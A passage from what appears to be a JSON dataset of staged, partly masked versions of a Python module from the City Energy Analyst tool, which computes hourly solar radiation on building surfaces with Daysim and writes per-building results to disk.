radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-2": "<mask token>\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-3": "<mask token>\n__author__ = 'Jimeno A. Fonseca'\n__copyright__ = (\n 'Copyright 2017, Architecture and Building Systems - ETH Zurich')\n__credits__ = ['Jimeno A. Fonseca', 'Kian Wee Chen']\n__license__ = 'MIT'\n__version__ = '0.1'\n__maintainer__ = 'Daren Thomas'\n__email__ = '[email protected]'\n__status__ = 'Production'\n<mask token>\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-4": "import json\nimport os\nimport numpy as np\nimport pandas as pd\nimport py4design.py2radiance as py2radiance\nimport py4design.py3dmodel.calculate as calculate\nfrom py4design import py3dmodel\n__author__ = 'Jimeno A. Fonseca'\n__copyright__ = (\n 'Copyright 2017, Architecture and Building Systems - ETH Zurich')\n__credits__ = ['Jimeno A. Fonseca', 'Kian Wee Chen']\n__license__ = 'MIT'\n__version__ = '0.1'\n__maintainer__ = 'Daren Thomas'\n__email__ = '[email protected]'\n__status__ = 'Production'\nfrom cea.constants import HOURS_IN_YEAR\nfrom cea.resources.radiation_daysim.geometry_generator import BuildingGeometry\nfrom cea import suppress_3rd_party_debug_loggers\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n 